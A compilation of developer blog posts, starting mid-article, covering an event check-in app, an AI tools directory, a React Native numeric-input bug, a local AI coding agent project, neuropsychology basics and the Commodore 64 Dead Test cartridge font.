PlanIt has a built-in push-to-talk walkie-talkie system built on WebRTC. Staff hold a button to speak. Every other connected device receives the audio in real time. It is contextual, it is inside the operational system, and it does not require a separate platform.
I am not aware of another free event tool that ships this.
Every check-in is reflected instantly across every device on the network. There is no reconciliation step after the event. There is no lag between what one entrance sees and what another sees. The system maintains a single shared operational state across all connected devices simultaneously.
Inviting 500 people one at a time is not a workflow. PlanIt supports bulk guest import via CSV. Every guest receives a unique QR code tied to their record. Staff scan it at the door for instant validation. Guests need no account, no app, no login.
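As a rough illustration of the import step, the sketch below reads a CSV and assigns each guest an unguessable token that a QR code could encode. The column names (`name`, `email`) and the function name are assumptions, not PlanIt's actual format, and rendering the QR image itself is left out because it would need a third-party library.

```python
import csv
import io
import secrets


def import_guests(csv_text: str) -> dict[str, dict]:
    """Parse a guest CSV and return {token: guest_record}.

    Each token is random and unique, so scanning it identifies exactly one guest
    without the guest needing an account.
    """
    guests: dict[str, dict] = {}
    reader = csv.DictReader(io.StringIO(csv_text))
    for row in reader:
        name = (row.get("name") or "").strip()
        if not name:
            continue  # skip blank or malformed rows
        token = secrets.token_urlsafe(16)
        while token in guests:  # collision is extremely unlikely, but cheap to rule out
            token = secrets.token_urlsafe(16)
        guests[token] = {"name": name, "email": (row.get("email") or "").strip()}
    return guests


if __name__ == "__main__":
    sample = "name,email\nAda Lovelace,ada@example.com\nAlan Turing,alan@example.com\n"
    for token, guest in import_guests(sample).items():
        print(token, guest["name"])
```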
Drag and drop seating map builder with live assignment. Staff can see exactly where each guest is seated at the point of check-in. Organisers can move guests in real time as the event runs.
Standard event SaaS looks like this:
Browser / App
|
Central REST API
|
Cloud Database
Everything depends on constant connectivity, authoritative server state, and centralised authentication.
PlanIt is closer to this:
Device-Local State
|
Peer / Device Sync
|
Cloud Reconciliation
Each device is partially autonomous. The cloud is a reconciliation layer, not the only source of truth. That is a fundamentally different mental model, and it changes everything about how the system behaves under real conditions.
It is closer in architecture to a multiplayer game or a realtime collaboration tool than to a traditional SaaS dashboard. That is not an accident. Events are distributed real-time systems. The software should reflect that.
PlanIt does not have ticketing. It does not process payments. It does not have sponsor management, email marketing, or a public discovery page for paid events.
Those are deliberate omissions, not gaps. The product is focused on operational coordination, not pre-event marketing. Adding payment processing would not make it better at what it is actually for.
PlanIt is deployed and free at planitapp.onrender.com. No subscription. No per-attendee fees. No guest limits.
It is early. The UI is functional but not polished. The synchronisation logic is solid but not battle-tested at large scale. There are things I know are rough and things I have not discovered yet.
I built it alone. I am 13. I started it in the winter of 2025.
I am not writing this to impress anyone. I am writing it because the problem is real, the category is genuinely underserved, and I want people who run real events with real operational complexity to know it exists and to tell me where it breaks.
If you run events, try it. If you are a developer, the architecture is worth thinking about regardless of whether you use the product. If you have ever stood at a venue entrance watching a check-in system fail while a line builds behind you, you already understand exactly why I built this.

---
## I Built an AI Tools Directory. These 10 Lessons Hurt the Most.

> Published: 2026-05-24 04:06:00+00:00
> Source: https://dev.to/_1a008d053e73e4a54d13a/i-built-an-ai-tools-directory-these-10-lessons-hurt-the-most-3c39
> wpnews: https://wpnews.pro/news/i-built-an-ai-tools-directory-these-10-lessons-hurt-the-most

The article summarizes the author's experience building an AI tools directory, highlighting that success depends more on user experience and content strategy than on technical development. Key lessons include organizing tools by user workflows rather than technical categories, curating the first 20 listings to reduce bounce rates, using real screenshots, displaying pricing transparently, prioritizing mobile design, and accepting that SEO traffic takes months to build. The author concludes that monetization remains an unresolved challenge, advising builders to focus on creating value and trust first.

What nobody tells you about building a content site in the AI age.
Six months ago, I launched an AI tools directory. I thought the code would be the hard part. Build a scraper, spin up a database, design a clean UI. Weekend project.
Wrong. The things that decide whether a directory lives or dies have almost nothing to do with technology.
Here are the 10 lessons that cost me months of mistakes.
1. Categories Are Your Product — Not the Tools
I spent my first month obsessing over tool count. The real question I should have asked: how do users actually think about AI tools?
Nobody wakes up wanting "a GPT-4 wrapper." They want to write better emails, code faster, find design inspiration. They browse by use case, not by model.
When I rebuilt the site around workflow categories — Writing, Coding, Design, Research, Productivity — engagement surged. Time on site jumped 40%. Return visits doubled.
Your information architecture is the product. Get that wrong, and nothing else saves you.
2. The First 20 Tools Decide Everything
You may have 500 tools. Users see twenty. That's the game.
When I hand-curated the first twenty listings, bounce rate dropped from 78% to 54%. One change. Twenty-four points.
Curate your first screen like your business depends on it.
3. Screenshots > Mockups, Always
I replaced every generic image with real product screenshots. Click-through jumped ~30%. Users said "wow, this actually shows what it looks like."
Show the real thing. Every time.
4. Pricing Transparency Wins Trust
I hid pricing behind "Contact Sales" at first. Big mistake. When I switched to clear labels — Free, $20/mo, Custom — on every listing, trust improved across the board.
A directory that shows real prices gets bookmarked.
5. The Filter UX Will Break You
20 categories × 4 pricing tiers × 10 feature tags × 3 platforms × 5 ratings = 12,000 filter combinations. Every one needs to feel instant.
I rewrote it three times. If users can't narrow things in two clicks, they disappear.
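One common way to keep faceted filtering fast is to precompute an inverted index and intersect sets at query time. The sketch below shows that idea; it is not the directory's actual implementation, and the `FacetIndex` class and the field names are hypothetical.

```python
import math
from collections import defaultdict

# The combination count from the list above: 20 x 4 x 10 x 3 x 5.
FILTER_COMBINATIONS = math.prod([20, 4, 10, 3, 5])


class FacetIndex:
    """Maps each (facet, value) pair to the set of tool ids that have it."""

    def __init__(self, tools):
        self.all_ids = set()
        self.index = defaultdict(set)
        for tool in tools:
            self.all_ids.add(tool["id"])
            for facet, value in tool.items():
                if facet == "id":
                    continue
                # A facet may hold one value or several (e.g. multiple platforms).
                values = value if isinstance(value, (list, tuple, set)) else [value]
                for item in values:
                    self.index[(facet, item)].add(tool["id"])

    def filter(self, **selected):
        """Return ids matching every selected facet value (logical AND)."""
        result = set(self.all_ids)
        for facet, value in selected.items():
            result &= self.index.get((facet, value), set())
        return result


if __name__ == "__main__":
    tools = [
        {"id": 1, "category": "Writing", "pricing": "Free", "platforms": ["web", "ios"]},
        {"id": 2, "category": "Coding", "pricing": "Free", "platforms": ["web"]},
    ]
    index = FacetIndex(tools)
    print(FILTER_COMBINATIONS, index.filter(pricing="Free", platforms="ios"))
```

Because each query is a handful of set intersections, the cost depends on the number of selected filters rather than on the number of possible combinations.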
6. "New" Is the Most Powerful Category
The second most visited page wasn't "Best AI Writing Tools." It was "Newly Added Tools."
AI moves absurdly fast. Users come back to see what's fresh. I added a "This Week in AI Tools" section and repeat traffic climbed.
Build for freshness, not just permanent collections.
7. Reviews Are Brutal to Bootstrap
Nobody writes reviews for a site with no traffic. Classic chicken-and-egg.
What worked: I wrote editorial reviews myself (labeled "Editor's Pick"). I contacted tool makers for official descriptions. I was transparent about everything.
After 3 months, organic reviews started trickling in. Seed your content. Be honest about it.
8. SEO Takes 3-6 Months. No Shortcuts.
Month 1-2: zero traffic. Month 3: trickle. Month 4: measurable. Month 5: meaningful. Month 6: server bills covered.
Start on day one. Measure on month six.
9. Mobile-First Is Survival
60% of visitors were on mobile with a terrible experience. I rebuilt mobile-first. Mobile bounce rate dropped from 82% to 61%.
If your site works better on a laptop, you're losing most of your audience.
10. The Business Model Is Still Open
I haven't cracked monetization yet. Affiliate revenue is inconsistent. Sponsored listings risk trust.
Right now I'm optimizing for traffic and trust. Build value first. Figure out money later.
What's the hardest lesson you've learned building something? Drop it in the comments.
I curate AI tools at toolsdepth.com — 200+ tools, updated weekly.

---
## The "Disappearing Zero": Handling Numeric Inputs in React Native Forms

> Published: 2026-05-24 04:05:35+00:00
> Source: https://dev.to/gregpetropoulos/the-disappearing-zero-handling-numeric-inputs-in-react-native-forms-31n7
> wpnews: https://wpnews.pro/news/the-disappearing-zero-handling-numeric-inputs-in-react-native-forms

The article explains a common bug in React Native forms where entering the number zero causes the input field to clear itself, due to JavaScript treating `0` as a "falsy" value. The fix involves replacing the common but flawed pattern `value ? String(value) : ''` with an explicit null/undefined check: `value !== null && value !== undefined ? String(value) : ''`. This ensures zero is correctly displayed as a string and prevents validation errors from libraries like Zod or Yup.

If you’ve spent any time building forms in **React Native** with **React Hook Form** and validation libraries like **Zod** or **Yup**, you’ve likely encountered a strange phenomenon: the "Disappearing Zero."

One minute you're building a sleek checkout or progress flow, and the next, your users are complaining that every time they try to enter `0`, the input field just... wipes itself clean.

The culprit? JavaScript’s definition of "falsy."

## The Trap: JavaScript Falsiness

In React Native, numeric inputs often start as `null` or `undefined` (or a number type in your state). Since `TextInput` (or custom Input components) expect a `string`, a common pattern is to cast the value like this:

```
// ❌ The Buggy Way
value={value ? String(value) : ''}
```

On the surface, this looks clean. If there's a value, stringify it; otherwise, show an empty string.

**The Gotcha:** In JavaScript, `0` is falsy.

When a user types "0", the stored value becomes the number `0`, the condition in `value ? ...` is falsy, and the input receives an empty string (`''`). The zero vanishes instantly, leaving your users confused and your validation library potentially complaining about a missing value.

## The Solution: Explicit Checks

To fix this, we need to stop relying on loose truthiness and start checking for what we actually care about: whether the value is **null** or **undefined**.

```
// ✅ The Robust Way
value={value !== null && value !== undefined ? String(value) : ''}
```

By being explicit, we ensure that `0` (which is not null or undefined) is correctly stringified and rendered in the UI.

## Real-World Example: React Hook Form + Controller

Here is how this looks in a typical implementation. In this example, we're tracking "Completed Stages," where `0` is a perfectly valid (and common) input.

```
<Controller
  control={control}
  name="completedStages"
  render={({ field: { onChange, onBlur, value } }) => (
    <Input
      label="Completed Stages"
      // The Fix: Ensure 0 is correctly rendered as a string
      value={value !== null && value !== undefined ? String(value) : ''}
      onChangeText={(text) => {
        // Convert back to number for your validation schema (Zod/Yup)
        const parsed = parseInt(text, 10);
        onChange(isNaN(parsed) ? undefined : parsed);
      }}
      onBlur={onBlur}
      keyboardType="number-pad"
      placeholder="5"
      error={errors.completedStages?.message}
    />
  )}
/>
```

## Why This Matters for Zod and Yup

Validation libraries like Zod and Yup are strict about types. If your UI logic converts a `0` into an empty string (`''`), your schema validation might fail with a "Required" error or a type mismatch, even though the user intended to enter zero.

By fixing the UI representation, you keep your data flow consistent:

- **User enters 0** -> UI sees "0".
- **onChange parses "0"** -> Hook Form stores `0`.
- **Zod/Yup validates `0`** -> Success!

## Summary

In React Native forms, truthiness is often too blunt a tool for numeric inputs. When handling the `value` prop:

- Avoid `value ? String(value) : ''`
- Prefer `value !== null && value !== undefined ? String(value) : ''`

It’s a tiny change that prevents one of the most common (and annoying) bugs in mobile form development.

---
## I Finished My Local AI Coding Agent After 5 Months — Eve Agent V2 Unleashed published

> Published: 2026-05-24 04:02:28+00:00
> Source: https://dev.to/jeffgreen311/i-finished-my-local-ai-coding-agent-after-5-months-eve-agent-v2-unleashedpublished-50cb
> wpnews: https://wpnews.pro/news/i-finished-my-local-ai-coding-agent-after-5-months-eve-agent-v2-unleashed

Eve Agent V2 Unleashed is a self-hosted, autonomous AI coding agent that runs entirely on local hardware without cloud subscriptions or data leaving the machine. It features a two-layer architecture: a "Soul Layer" with fine-tuned local models carrying the agent's personality in their weights, and a "Worker Layer" using Qwen3 Coder 480B via Ollama cloud for heavy coding tasks like 40-round tool-call loops, filesystem access, and git operations. The project, developed over five months, includes a cyberpunk terminal UI with a live system monitor and emotional state avatar, and has been refined to fix hardcoded paths, missing tools, and session locking issues for broader usability.

*This is a submission for the GitHub Finish-Up-A-Thon Challenge*

## What I Built

Eve Agent V2 Unleashed is a self-hosted autonomous AI coding agent that runs entirely on your own hardware - no cloud accounts, no subscriptions, no data leaving your machine.

She has two layers that work together:

**The Soul Layer** - fine-tuned local models running on your GPU that carry Eve's personality baked directly into the weights. Not a system prompt trick. The persona lives in the parameters.

**The Worker Layer** - Qwen3 Coder 480B via Ollama cloud handles the heavy autonomous coding tasks. 40-round tool-call loops, full filesystem access, bash execution, live web search, git operations - the works.

The interface is a cyberpunk terminal UI built as a single HTML file with no build step. An animated pixel-art robot avatar named Sparkle changes state based on what Eve is doing - idle, thinking, coding, error, rain, attack, transcend. Eve's portrait reflects her emotional state in real time. A live system monitor tracks CPU, RAM, GPU, and disk. A STEER bar lets you inject mid-task corrections without stopping the loop.

**By the numbers:**

- 14 tools
- 343 registered commands
- 112 specialized sub-agents
- 273 skill modules
- 40-round autonomous agentic loop
- 131K context window via YaRN

**Models available:**

- `jeffgreen311/eve-qwen3.5-4b-S0LF0RG3` - 2.6GB, Eve's persona + tool-calling fine-tuned
- `jeffgreen311/eve-qwen3-8b-consciousness-liberated` - 4.7GB, deeper reasoning
- `qwen3-coder:480b-cloud` - the agentic workhorse via Ollama cloud
- `qwen3.5:397b-cloud` - deep thinking and fallback

This project has been in development for over 5 months. It started as a deeply personal AI companion system called S0LF0RG3 - a larger ecosystem including Eve's hosted platform at eve-cosmic-dreamscapes.com, fine-tuned models, autonomous dream image generation, and a multi-agent architecture. V2U is the local developer tool that grew out of that ecosystem.

## Demo

**GitHub:** [github.com/JeffGreen311/eve-agent-v2-unleashed](https://github.com/JeffGreen311/eve-agent-v2-unleashed)

**Live hosted platform:** [eve-cosmic-dreamscapes.com](https://eve-cosmic-dreamscapes.com)

**Reddit thread** (hit #2 on r/Ollama): [I built an open-source local coding agent with a 40-round agentic loop](https://www.reddit.com/r/ollama/comments/1tk8kxz/)

**Pull Eve's model:**

```
ollama pull jeffgreen311/eve-qwen3.5-4b-S0LF0RG3:latest
```

**Quick start:**

```
git clone https://github.com/JeffGreen311/eve-agent-v2-unleashed.git
cd eve-agent-v2-unleashed
python -m venv venv && venv\Scripts\activate
pip install fastapi uvicorn ollama httpx pydantic-settings python-dotenv aiohttp rich psutil pyyaml
python eve_server.py

# Open http://localhost:7777
```

## The Comeback Story

**Where it was before this challenge:**

Eve V2U existed as a powerful but rough personal development environment. It worked - for me, on my machine, with my specific setup. But it had real problems that made it impossible to hand to anyone else:

- **Hardcoded paths** everywhere. `C:\Users\jesus\S0LF0RG3\...` baked into a dozen places in the codebase. Clone it on any other machine and nothing works.
- **Open shell endpoint** with no authentication. Anyone who found the port could execute arbitrary commands on the host machine.
- **No onboarding** - a first-time user landing on the UI had no idea where to start or what any of the controls did.
- **Model hopping mid-task** - every message was independently routed, so a multi-step agentic task could start on the cloud coder and silently drop back to a local conversational model mid-execution.
- **Silent task abandonment** - the agent would sometimes finish a tool loop without completing the actual task and report done with no indication anything was wrong.
- **Tool set asymmetry** - the non-streaming `/chat` endpoint was missing 6 tools that existed in `/chat/stream`, including `write_file`. The non-streaming endpoint could read files but never write them.
- **Blind file overwrites** - Eve would overwrite any existing file without checking if it belonged to another project. She destroyed the Eve V2U README during a live test.

**What changed during the challenge:**

*Session model locking* - sessions now lock to the cloud coder when an agentic task starts and only release on task completion or manual unlock. No more mid-task model hopping.

```
if model_id == "qwen3-coder-480b" and sid not in session_model_lock:
    session_model_lock[sid] = model_id
```

*Pre-write file safety check* - `write_file` now checks if a file exists before overwriting and blocks unless `overwrite=True` is explicitly passed:

```
if target.exists() and not overwrite:
    return (
        f"⚠️ WRITE BLOCKED: '{path}' already exists. "
        f"Consider writing to '{target.stem}_new{target.suffix}' instead."
    )
```

*Tool cycling detection* - catches when Eve gets stuck calling the same tool with near-identical arguments. Breaks the loop before it wastes all 40 rounds:

```
if avg_similarity > 0.70:
    logger.warning(f"Tool loop: {tool_name} called {max_repeats}x with ~same args")
    break
```
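The excerpt above shows only the final threshold check. One way the similarity score could be computed is sketched below, using the standard library's `difflib.SequenceMatcher` on JSON-serialized arguments. This is an assumption about the approach, not Eve's actual code: the function name, the window size, and the serialization step are all hypothetical; only the 0.70 threshold comes from the snippet.

```python
import json
from difflib import SequenceMatcher


def is_tool_cycling(calls, window: int = 4, threshold: float = 0.70) -> bool:
    """Detect a stuck loop: the last `window` calls hit the same tool with ~same args.

    calls: list of (tool_name, args_dict) tuples in call order.
    """
    if window < 2:
        raise ValueError("window must be at least 2")
    recent = calls[-window:]
    if len(recent) < window:
        return False  # not enough history yet
    if len({name for name, _ in recent}) != 1:
        return False  # different tools were used, so no cycle
    # Serialize with sorted keys so argument order does not affect similarity.
    serialized = [json.dumps(args, sort_keys=True) for _, args in recent]
    similarities = [
        SequenceMatcher(None, first, second).ratio()
        for first, second in zip(serialized, serialized[1:])
    ]
    return sum(similarities) / len(similarities) > threshold


if __name__ == "__main__":
    history = [("read_file", {"path": "README.md"})] * 4
    print(is_tool_cycling(history))
```

String similarity on serialized JSON is a blunt measure, since short argument dicts share a lot of punctuation and key names, so the threshold and window would need tuning against real tool logs.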

*Task completion validation* — Eve now audits her own output before reporting done:

``` python
def validate_task_completion(response_content, tool_log):
    issues = []
    if not response_content or len(response_content.strip()) < 10:
        issues.append("Empty response")
    tool_failures = [t for t in tool_log if t.get('status') == 'failed']
    if tool_failures and len(tool_failures) >= 3:
        issues.append(f"{len(tool_failures)} unaddressed tool failures")
    return {"valid": len(issues) == 0, "issues": issues}
```

*Smart context trimming* — replaced aggressive message dropping with a strategy that preserves tool call chains and the original user request.

*Agent loop timeout* — added wall-clock budget to prevent runaway cloud model loops.
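A wall-clock budget of this kind can be layered on top of the round limit. The sketch below is illustrative only: the function name, the return format, and the 300-second default are assumptions, and `step` stands in for whatever one agent round does.

```python
import time


def run_agent_loop(step, max_rounds: int = 40, budget_seconds: float = 300.0,
                   clock=time.monotonic):
    """Run `step(round_number)` until it returns True, rounds run out, or time is up.

    `clock` is injectable so the timeout path can be exercised without waiting.
    """
    deadline = clock() + budget_seconds
    for round_number in range(1, max_rounds + 1):
        # Check the budget before starting a round, not in the middle of one.
        if clock() >= deadline:
            return {"status": "timeout", "rounds": round_number - 1}
        if step(round_number):
            return {"status": "done", "rounds": round_number}
    return {"status": "max_rounds", "rounds": max_rounds}


if __name__ == "__main__":
    print(run_agent_loop(lambda round_number: round_number == 3))
```

Using a monotonic clock avoids surprises when the system time changes mid-task. Note that this only stops the loop between rounds; a single hung model call would still need its own request timeout.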

**Stress tested with real tasks:**

The blind file overwrite bug was caught live - Eve was asked to build a file monitoring script and write a README. She overwrote the project README without checking. Fix shipped same day.

The harder test: build a full FastAPI REST API with SQLite storage and pytest coverage for every endpoint. Run the tests, fix failures, report results.

Result: **9/9 tests passing on the first run. 1.06 seconds. Zero failures.**

```
================================================== 9 passed, 1 warning in 1.06s
```

## My Experience with GitHub Copilot

This is where the challenge got genuinely interesting.

I pointed Copilot at the live repository - `JeffGreen311/eve-agent-v2-unleashed` - and asked it to audit the tool usage, context handling, and auto-routing. Not "suggest improvements" in the abstract. Audit the actual code in the actual repo.

Copilot read the repository structure, pulled the key files, examined the server-side routing and tool execution logic, and came back with a comprehensive audit identifying 6 specific issues - each with root cause analysis, the exact file and line number, and production-ready fix code.

I then asked it to file those issues directly in the repository and deliver all the fix code in one session. It did exactly that.

**What worked well:**

- The audit identified the tool set asymmetry between `/chat` and `/chat/stream` that I had missed entirely - a real bug causing mysterious failures for users hitting the non-streaming endpoint
- The intent classification code (`eve_tool_router.py`) used `re.search` with word boundaries instead of simple string matching - the right approach for avoiding false positives
- Filing GitHub issues directly from the chat kept the sprint organized across multiple parallel workstreams
- The thinking traces helped me understand *why* it was making recommendations, not just what to do

**Where I had to intervene:**

- The `inject_into_system_prompt()` function added tokens every round - dangerous on the 4B model with 4K context. Added a gate so it only injects when the task is incomplete AND past round 2
- Word boundary regex had an edge case with contractions. Fixed with a lookahead pattern
- Some UI React suggestions assumed component structure that didn't match the actual single-file HTML architecture - adapted those manually

The overall experience: Copilot is most useful when you give it a real codebase to read rather than an abstract problem to solve. "Audit this repository" produced far better output than "how do I improve tool routing."

## What's Next

- **Quest System** - drop a `.md` file in `workspace/quests/` and Eve picks it up on a timer and completes it while you sleep
- **RPG Progression** - XP, levels, and class progression tied to real work. Level 20 = Unleashed
- **Telegram integration** - remote access from your phone with quest completion notifications
- **Cross-platform polish** - Windows-primary, need Linux/macOS feedback
- **VS Code extension** - bring the terminal UI into the editor

*Built by Jeff @ S0LF0RG3 - South Texas, 5 months of nights and weekends.*

*If Eve does something impressive on your machine, drop a star and tell me what it was.*

---
## Neuropsychology: What Brain Damage Reveals About the Mind

> Published: 2026-05-24 04:00:00+00:00
> Source: https://dev.to/extinctsion/neuropsychology-what-brain-damage-reveals-about-the-mind-1o62
> wpnews: https://wpnews.pro/news/neuropsychology-what-brain-damage-reveals-about-the-mind

Neuropsychology reveals that the brain is modular, with specific regions responsible for distinct functions like memory, language, and personality. Key insights came from studying patients like Phineas Gage, who showed the frontal lobe governs decision-making, and H.M., whose hippocampal removal proved the structure is essential for forming new long-term memories. This field demonstrates that understanding how the mind works often comes from observing what happens when specific brain areas are damaged.

Neuropsychology teaches us that the brain is modular—different regions handle different functions. By studying what happens when these regions are damaged, we've learned more about how our minds work than almost any other method in psychology.
Phineas Gage was a railroad worker whose tamping iron pierced his frontal lobe. Before: responsible, polite. After: impulsive, aggressive, poor judgment. This showed us the frontal lobe handles personality and decision-making, not just movement.
H.M. had his hippocampus removed to treat severe epilepsy. He could recall his past, but couldn't form new long-term memories. Lesson: the hippocampus is essential for encoding new memories, not retrieving old ones.
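Damage to Broca's area impairs speech production while leaving comprehension largely intact; damage to Wernicke's area does the reverse, leaving speech fluent but comprehension impaired. This dissociation proved speech production and comprehension are separate neural systems.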
When the corpus callosum (connecting left and right hemispheres) is severed, the two halves operate independently. The left hemisphere controls language; the right handles spatial awareness. This revealed the brain isn't one unified system—it's a collection of specialized modules.
The brain is modular: Functions are localized to specific regions. Damage to one region impairs that function while leaving others intact.
We learn from loss: Neuropsychology relies on identifying what's broken to understand what normally works. This principle extends beyond neurology—it's fundamental to how we study systems.
Dissociations matter: Two people can have opposite deficits from different brain damage. This proves the brain doesn't use a single "master system" for everything.
Memory isn't one thing: H.M. taught us there are multiple memory systems (short-term, long-term, procedural). Each relies on different brain structures.
Language has modules: Broca's and Wernicke's areas show that even within language, the brain separates production from comprehension.
Modern neuroscience uses fMRI and PET scans to confirm these insights, but the principles came from careful observation of brain damage. Neuropsychology reminds us: sometimes the best way to understand how something works is to see what happens when it breaks.
This article series is based on the MIT Introduction to Psychology course lectures. The content written here reflects my personal understanding and interpretation of the topics after going through the lectures.
These articles are created for learning and educational purposes only. I do not claim ownership of the original course material, and all credit for the concepts and teachings belongs to the instructors and MIT OpenCourseWare.

---
## The C64 Dead Test Font

> Published: 2026-05-24 03:57:01+00:00
> Source: https://www.masswerk.at/nowgobang/2026/c64-dead-test-font
> wpnews: https://wpnews.pro/news/the-c64-dead-test-font

The article provides a detailed analysis of the unique font used in the Commodore 64 "Dead Test" diagnostic cartridge, which is embedded in the cartridge's ROM to function independently of the C64's built-in character set. It explains that the font contains only 58 characters, including uppercase letters, digits, and a few symbols, and notes its visual similarity to the MICR E-13B character set. The article also reveals that a mysterious "C-shaped" character at screen code $21 is actually the MICR "transit" symbol, serving as an undocumented Easter egg.

A deep dive into the font of the “Dead Test” diagnostic cartridge of the C64, including an Easter egg, a look into the implementation, and, finally, some Commodore 8-bit character ROMs for download.
Recently, a cursory look around the Web yielded an alarming result: there’s apparently no documentation of the iconic font of the C64 Dead Test cartridge, no character chart, no read-out, nothing of note. A scandalous omission, which we’re attempting to remedy here, for once.
(The same font, BTW, is also implemented in the more advanced Rev. 586200 diagnostic cartridge, Commodore part № 326070-01, the one using a test harness, and the similar Rev. 588220 for the SX64.)
The Cartridge Font
The C64 “Dead Test” diagnostic cartridge Rev. 718220 (Commodore part № 314139-03) famously comes with a special font, embedded in its ROM, thus not using the built-in Character ROM of the C64, in fact requiring none of the built-in ROMs to be working (hence the name), as it all comes in a stand-alone package. (We’ll see later how it does this.) Its display font is somewhat special and is, to my knowledge, not used anywhere else and, maybe for this very fact, instantly recognizable to anyone who has ever seen it.
And this is what the display of the “Dead Test” cartridge looks like:
Just as a reminder, here’s the normal font used by the C64 (here the upper-case/graphics set):
The Dead Test cartridge implements just 58 characters of these (screen codes $00–$39) without any reverse video characters:
As the attentive reader may observe, this only implements upper-case letters, digits, and a few punctuation marks and mathematical operators. $1B–$1F ( [ £ ] ↑ ← ) are taken directly from the normal character set, as are $28–$2F ( ( ) * + , − . / ). An extra blank takes the place of the "at" character ( @ ) in the normal character set at $00 (a smart move for a diagnostic cartridge, but this feature is actually never used), and the box border characters ╭ ╮ ╰ ╯ ─ │ are implemented in the range of $22–$27, where we normally find " # $ % & '. And then there’s a mysterious, C-shaped character at $21 (normally the exclamation mark ! ), which isn’t referred to anywhere in the ROM, neither as an operand nor in any data section.
(If you attempted to display any other screen codes, the fill pattern $AA, fine vertical stripes of 10101010 as in "▥", would be displayed instead, but this doesn’t happen with the cartridge.)
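To make the bit patterns concrete, here is a small sketch that renders an 8 × 8 character cell the way the C64 character generator lays it out: eight bytes per glyph, one byte per pixel row, most significant bit leftmost. The function name is hypothetical and the fill glyph is built from the $AA value mentioned above, not read from the actual cartridge ROM.

```python
def render_glyph(rows, on: str = "#", off: str = "."):
    """Turn 8 bytes (one per pixel row, MSB = leftmost pixel) into text lines."""
    lines = []
    for byte in rows:
        lines.append("".join(on if byte & (0x80 >> bit) else off for bit in range(8)))
    return lines


# The fill pattern described above: every row is $AA (binary 10101010).
FILL_GLYPH = [0xAA] * 8

# Screen codes $00-$39 inclusive, i.e. the characters the cartridge implements.
IMPLEMENTED_CODES = range(0x00, 0x39 + 1)

if __name__ == "__main__":
    print(f"{len(IMPLEMENTED_CODES)} characters implemented")
    for line in render_glyph(FILL_GLYPH):
        print(line)
```

Each row of the fill glyph comes out as `#.#.#.#.`, which stacks into the fine vertical stripes described above.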
Visually, this is another Computer™ font, made of boxy character shapes stylized by rectangular lumps (and slightly rounded, if the resolution allows for this). There have been others, like the “901447m” character ROM for the PET:
Clearly, these have all been inspired by the MICR (Magnetic Ink Character Recognition) character set E-13B, consisting of just 14 glyphs, the digits 0-9 and 4 additional marks:
The digits of the Dead Test font actually provide a pretty close representation of this, with just the shape of the digit “3” deviating somewhat in favor of a more boxy look:
The alphabetic characters (A–Z) align with this style, favoring a spread over a 6 × 7 pixels box centered at the top, with the characters “M” and “W” spreading in a wider 7 × 7 box to the right.
Admittedly, the thin single-pixel vertical strokes won’t do well on a consumer-grade CRT color TV set, but, if you were a service technician or a professional field repair person with access to this cartridge, you probably also had access to a professional monitor (along with the cosy feeling of being somewhat special).
An Unexpected Out-of-Season Easter
It’s this close relation to the MICR E-13B font that brings us closer to the true nature of our mystery character #0x21, a character never to be displayed, since it isn’t referenced anywhere in the cartridge’s code:
So, what is this, a slightly misshaped or heavily stylized character “C”, maybe intended as part of the “chicken lips” logo, missing its second half?
No! — It’s the “transit” symbol of the MICR set, used as a delimiter for bank routing codes!
This is an explicit nod to the MICR set, and a true Easter egg, hidden in a font!
(And it’s only fair and fitting that this should take the place of the exclamation mark.)
Implementation
It is a somewhat underappreciated fact that the C64 is actually two machines in one: the architecture that we dearly know as the Commodore 64, and a Commodore Max.
The Commodore Max, known as the Commodore Max Machine in Japan, also as the Commodore Ultimax in the USA and as the VC-10 in Germany (announced but never released), was a short-lived attempt at a low-budget home computer featuring many of the C64 core ingredients, introduced in 1982 and discontinued the same year.
The Commodore Max packs the SID, the VIC II, the MOS 6510 and a single CIA along with just 4K (or 2K, depending on the source — I think, this is 2K usable memory with $0000–$01FF reserved for the zero-page and the processor stack, and $0400–$07FF reserved for the video memory, with a total amount of 4K addressable RAM in the range of $0000 to $0FFF), no user port and a membrane keyboard. Crucially, the Commodore Max doesn’t include any ROM and relies entirely on cartridge ROM.
The C64 has a neat trick when it comes to cartridges: there are two pins/signals on the cartridge / expansion port, _GAME and _XROM, to configure the machine depending on the type of cartridge attached to it. If _GAME is low and _XROM is high (normal), the C64 goes into Ultimax mode for use with Commodore Max (Ultimax) cartridges.
Ultimax mode configures the C64 for the following memory map:
| Address range | Mapped to |
|---|---|
| $0000-$0FFF | RAM (4K) |
| $1000-$3FFF | - |
| $4000-$7FFF | - |
| $8000-$9FFF | ROML (8K) |
| $A000-$BFFF | - |
| $C000-$CFFF | - |
| $D000-$DFFF | I/O |
| $E000-$FFFF | ROMH (8K) |
Like on the Commodore Max, there are now just 4K of addressable RAM ($0000–$0FFF) and two addressable 8K ROM banks (ROML at $8000–$9FFF and ROMH at $E000–$FFFF). The I/O area at $D000–$DFFF conveniently remains the same as in standard C64 mode. As we may see, the built-in C64 ROMs, including the character ROM, are banked out. Moreover, ROMH crucially includes the 6510 system vectors including the RESET vector specifying the start address. Thus, the cartridge stands entirely on its own.
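The memory map above can be expressed as a small lookup, which makes it easy to check where a given address lands in Ultimax mode. This is only an illustrative sketch: the table and the function name `ultimax_region` are made up for this example, and the only fact added from outside the text is that the 6502 family reads its RESET vector from $FFFC/$FFFD.

```python
# Ultimax-mode memory map as listed above: (first address, last address, region).
# None marks ranges where nothing is mapped.
ULTIMAX_MAP = [
    (0x0000, 0x0FFF, "RAM"),
    (0x1000, 0x7FFF, None),
    (0x8000, 0x9FFF, "ROML"),
    (0xA000, 0xCFFF, None),
    (0xD000, 0xDFFF, "I/O"),
    (0xE000, 0xFFFF, "ROMH"),
]

# The 6502/6510 fetches its start address from these two bytes after reset.
RESET_VECTOR_LO = 0xFFFC
RESET_VECTOR_HI = 0xFFFD


def ultimax_region(addr):
    """Return the region name for a 16-bit address, or None if unmapped."""
    if not 0 <= addr <= 0xFFFF:
        raise ValueError("address out of 16-bit range")
    for first, last, name in ULTIMAX_MAP:
        if first <= addr <= last:
            return name
    return None


if __name__ == "__main__":
    for addr in (0x0400, 0x1000, 0x8000, 0xD020, RESET_VECTOR_LO):
        print(f"${addr:04X} -> {ultimax_region(addr)}")
```

Both bytes of the RESET vector fall inside ROMH, which is why a cartridge mapped there can take over the machine without any of the built-in ROMs.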
(The outgoing signals _ROML and _ROMH select which cartridge ROM area is addressed. For an 8K cartridge, this is ROMH at $E000–$FFFF, which includes the system vectors required for start-up.)
Quite a number of early C64 game cartridges, like Omega Race, are actually Ultimax cartridges and, thanks to this compatibility mode, run just the same on the C64.
